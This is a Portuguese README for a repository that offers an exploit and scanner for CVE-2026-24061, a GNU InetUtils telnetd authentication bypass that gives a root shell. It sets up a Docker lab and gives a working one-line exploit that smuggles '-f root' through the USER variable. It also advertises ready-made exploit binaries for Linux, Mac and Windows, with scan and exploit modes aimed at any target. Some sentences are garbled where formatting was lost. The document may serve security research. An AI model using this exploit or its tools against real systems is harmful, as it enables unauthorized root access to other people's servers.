
Exploit e scanner para CVE-2026-24061, uma bypass de autenticação no telnetd que concede shell root por meio de uma variável de ambiente USER manipulada. Inclui configuração de ambiente Docker e binários de exploit multiplataforma.
CVE-2026-24061 é uma vulnerabilidade de bypass de autenticação no telnetd que permite que atacantes contornem a verificação de identidade por meio de combinações específicas de variáveis de ambiente e obtenham diretamente um shell com privilégios de root.
Existe uma falha na lógica de autenticação do telnetd. Ao usar a opção -a (login automático) combinada com uma variável de ambiente USER específica (como -f root), é possível contornar o processo normal de autenticação e fazer login diretamente como usuário root.
GNU InetUtils é uma coleção de ferramentas de rede básicas sob o projeto GNU. Ele contém muitos clientes e daemons de rede tradicionais, como ftp, telnet, rsh, rlogin, , etc., fornecendo uma biblioteca abrangente de componentes de rede no estilo GNU. é o programa servidor neste kit de ferramentas responsável por lidar com solicitações de conexão Telnet recebidas, com a principal tarefa de fornecer aos usuários remotos uma interface de terminal interativa (geralmente um Shell).
tftptelnetdinetd ou xinetd na porta 23. Quando uma solicitação chega, telnetd é iniciado.login subjacente do sistema para verificar o nome de usuário e a senha.Primeiro, baixe este repositório localmente. A estrutura de diretórios é a seguinte:

Neste diretório, execute o seguinte comando para iniciar o ambiente vulnerável para CVE-2026-24061:
docker compose up -d --build

Após a inicialização, o serviço telnet será executado em 0.0.0.0:2323

-a do telnetd é usada para habilitar a funcionalidade de login automático-a está habilitado, o telnetd lê a variável de ambiente USER como o nome de usuário de loginUSER for definida como -f root, o telnetd interpreta incorretamente -f como um sinalizador de opção e root como o usuário alvo# Defina a variável de ambiente USER e conecte-se com telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323
Ao obter sucesso, você obterá um shell interativo com privilégios de root:

cd exp

Você pode ver três arquivos: exp, exp_darwin e exp.exe são arquivos executáveis para Linux, Mac e Windows, respectivamente. Escolha o que você precisa. O código-fonte da ferramenta também é fornecido. Se precisar de outras versões, você pode compilá-las você mesmo. Aqui estou usando exp para Linux, que possui informações de ajuda detalhadas.

Detectar se a vulnerabilidade existe (por padrão, verifica a porta 23):
./exp -mode scan -target seu-ip -port sua-porta

Explorar a vulnerabilidade e obter um shell:
./exp -mode exploit -target seu-ip -port sua-porta

Este projeto é apenas para fins de pesquisa de segurança e educação. Não o use em sistemas não autorizados. Os usuários assumem toda a responsabilidade legal por quaisquer consequências resultantes do uso desta ferramenta.